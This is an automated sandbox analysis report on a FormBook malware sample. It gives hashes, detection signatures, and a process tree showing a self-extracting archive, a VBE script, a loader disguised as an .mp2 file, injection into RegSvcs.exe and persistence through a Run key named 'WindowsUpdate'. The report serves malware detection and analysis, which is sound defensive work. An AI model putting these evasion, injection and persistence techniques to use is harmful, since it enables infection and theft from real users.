Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FX6KTgnipP.exe

Overview

General Information

Sample name:FX6KTgnipP.exe
renamed because original name is a hash value
Original sample name:6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a.exe
Analysis ID:1569431
MD5:09ac9eae3546e42f6bbcc605242133d0
SHA1:ca07478bd504d2c690948e9c21771ec5ac4de018
SHA256:6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • FX6KTgnipP.exe (PID: 2168 cmdline: "C:\Users\user\Desktop\FX6KTgnipP.exe" MD5: 09AC9EAE3546E42F6BBCC605242133D0)
    • wscript.exe (PID: 1268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3320 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1692 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 1796 cmdline: "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dmqiuorkt.mp2 (PID: 1212 cmdline: dmqiuorkt.mp2 tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 2292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 3236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • dmqiuorkt.mp2.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
              • UserAccountControlSettings.exe (PID: 2632 cmdline: "C:\Windows\SysWOW64\UserAccountControlSettings.exe" MD5: 5AEA4CD2B6CA1E44E27D1A95917FEE60)
                • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
              • RegSvcs.exe (PID: 1544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • RegSvcs.exe (PID: 3656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • WerFault.exe (PID: 5664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 2320 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • dmqiuorkt.mp2.exe (PID: 6808 cmdline: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 3152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 3900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • dmqiuorkt.mp2.exe (PID: 6900 cmdline: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 5936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              14.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1268, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 3320, ProcessName: cmd.exe
                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1268, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 3320, ProcessName: cmd.exe
                Sigma detected: New RUN Key Pointing to Suspicious Folder
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: dmqiuorkt.mp2 tdggoffi.bin, CommandLine: dmqiuorkt.mp2 tdggoffi.bin, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1796, ParentProcessName: cmd.exe, ProcessCommandLine: dmqiuorkt.mp2 tdggoffi.bin, ProcessId: 1212, ProcessName: dmqiuorkt.mp2
                Sigma detected: Use NTFS Short Name in Command Line
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, CommandLine: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, ProcessId: 6808, ProcessName: dmqiuorkt.mp2.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, ProcessId: 1212, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: FX6KTgnipP.exeReversingLabs: Detection: 71%
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: FX6KTgnipP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: FX6KTgnipP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: FX6KTgnipP.exe
                Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0024F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0024F826
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00261630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00261630
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00271FF8 FindFirstFileExA,0_2_00271FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_008BE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008C9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008CA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_008CA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_008C65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0088C642 FindFirstFileExW,7_2_0088C642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_008C72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C7248 FindFirstFileW,FindClose,7_2_008C7248
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0039E387
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039D836
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039DB69
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003A9F9F
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003AA0FA
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_003AA488
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A65F1 FindFirstFileW,FindNextFileW,FindClose,15_2_003A65F1
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0036C642 FindFirstFileExW,15_2_0036C642
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A7248 FindFirstFileW,FindClose,15_2_003A7248
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_003A72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,7_2_008CD7A1
                Source: explorer.exe, 00000020.00000000.3696594073.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
